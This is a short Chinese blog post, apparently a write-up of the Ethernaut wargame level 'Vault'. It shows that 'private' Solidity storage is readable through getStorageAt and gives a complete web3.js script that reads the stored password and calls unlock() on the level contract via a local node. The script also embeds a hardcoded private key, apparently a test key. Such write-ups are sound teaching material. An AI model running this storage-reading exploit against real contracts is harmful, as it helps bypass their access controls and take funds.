blockchain | ethernaut 08 Vault
blockchain | ethernaut 08 Vault
这关考察读取私有变量,直接getStorageAt即可。
顺便说明:
web3.js读取public变量可以直接contract.methods.[变量名].call()获取
对于私有变量需要用插槽位置的方式去读。
exp:
const Web3 = require('web3');
const fs = require('fs');
const deploy = require('./Deploy.js'); // 导入部署模块
const rpcURL = 'http://127.0.0.1:8545';
//const addr = '0xda8e0A6Becd46E3C1d25BEbcc0E8f6723Cf2F924';
const web3 = new Web3.Web3(rpcURL); // 链接网络节点
const privateKey = '0x957c03cef7400defc7585d5dd81c48455557aa29c12c627ad0fd17d73effe696';
web3.eth.accounts.wallet.add(privateKey);
const wallet = web3.eth.accounts.wallet[0];
console.log(wallet)
var money = 0;
web3.eth.getBalance(wallet.address).then((res)=>{console.log(res); money=res});
let exp = async function(){
let aim_contract_addr = "0xB9a9c6670BFA9513BB9556E1f6a28A2112c6e39d";
let data = await web3.eth.getStorageAt(aim_contract_addr, 1);
console.log(data); // 读private数据
let jsonabi = JSON.parse(fs.readFileSync('contracts/Vault.json', 'utf8')).abi
var contract = new web3.eth.Contract(jsonabi, aim_contract_addr, {
from: wallet.address
});
let ret = await contract.methods.unlock(data).send(
{
from: wallet.address,
gas: 1000000,
gasPrice: 10000000000,
}
);
console.log(ret);
console.log(await web3.eth.getStorageAt(aim_contract_addr, 0));
}
exp();
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/17680244.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com